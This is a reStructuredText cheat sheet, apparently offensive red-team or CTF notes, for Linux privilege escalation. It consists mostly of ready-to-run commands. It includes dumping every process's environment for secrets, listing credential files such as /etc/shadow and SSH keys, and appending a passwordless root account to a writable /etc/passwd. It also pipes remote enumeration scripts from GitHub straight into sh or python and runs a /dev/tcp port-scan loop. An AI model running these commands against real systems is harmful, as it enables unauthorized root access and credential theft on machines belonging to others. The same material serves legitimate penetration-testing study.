####
Enum
####

************
Things to do
************

| Basic enum 
| https://book.hacktricks.xyz/linux-hardening/privilege-escalation
| https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#references

.. code-block:: bash

  cat /etc/issue 
  cat /etc/os-release
  uname -a # Always check online for CVE
  groups # Docker ? sudo ? 
  cat /etc/passwd
  cat /etc/group 
  ps faxwu | cat
  dpkg -l
  lsmod
  /sbin/modinfo interestingmodule
  systemctl --type=service | cat # List services

  # Network
  ss -lapunte | cat
  netstat -ntlp | cat
  ip a
  ip route
  route 
  routel
  cat /etc/iptables/rules.v4
  iptables -L

  # Files
  ls -ltrha / /opt /srv /home/* /root/
  ls -ltrha /var/www/*
  find /home/ -type f -size +0
  sudo -l # if you need TTY : python3 -c 'import pty; pty.spawn("/bin/bash")'
  find / -perm -4000 2>/dev/null # Find all SUID binaries
  find / -perm -u=s -type f 2>/dev/null
  find / -type f \( -user userblabla -o -group userblabla \) -size +0 -exec file {} + 2>/dev/null 
  mount
  cat /etc/fstab
  lsblk
  find / -writable -type d 2>/dev/null
  cat ~/.bashrc
  /usr/sbin/getcap -r / 2>/dev/null
  

  # Env by process
  cd /proc/ ; for i in [0-9]* ; do echo -e "\n## $i $(ps -fp $i 2>/dev/null)" ; cat $i/environ 2>/dev/null | tr '\0' '\n' | strings ; done 

  # Crons
  ls -lah /etc/cron*
  crontab -l
  grep "CRON" /var/log/syslog

  # App armor status
  aa-status

  # Add user if passwd is writable
  cat <<'EOF'>>/etc/passwd
  hackerhackerhacker::0:0:root:/root:/bin/bash
  EOF
  su - hackerhackerhacker -c "sed -i '/hackerhackerhacker/d' /etc/passwd;id;su -"

|

*******
Scripts
*******

LinPEAS
*******

.. code-block:: bash

  curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

LinEnum
*******

.. code-block:: bash

  curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh

SUID Enum
*********

| Enum SUID program with python2/3 built-in modules

| https://github.com/Anon-Exploiter/SUID3NUM

.. code-block:: bash

  curl https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py | python

|

*************
Watch Process
*************

| Watch for existing and new process 
| https://github.com/DominicBreuker/pspy

|

*****************
Interesting Files
*****************

Public
******

.. code-block:: bash

  #
  /etc/issue
  /etc/passwd
  /etc/group

Root
****

.. code-block:: bash

  #
  /etc/sudoers
  /etc/shadow
  /etc/master.passwd # OpenBSD

  /var/spool/cron/crontabs/*
  /var/spool/cron/*

User
****

.. code-block:: bash

  #
  /home/*/.bash_history
  /home/*/.ssh/*


Auditd (adm)
************

When parsing audit logs you may encounter hex encoded data

.. code-block:: bash

  for VAR in cmd data ; do
    for DATA in $(grep "$VAR=[^\"]" /var/log/audit/audit.log*) ; do
      echo "$DATA" | sed "s#.*$VAR=\([^ ]*\).*#\1#" | xxd -r -p | tr -dc '[:print:]\t\n' | echo $(cat)
    done
  done

|

**********
Scan Ports
**********

| Retrieve hidden ports without scanner/netstat

.. code-block:: bash

  bash -c 'for i in {1..65535};do echo>/dev/tcp/127.0.0.1/$i&&echo OK $i;done' 2>/dev/null

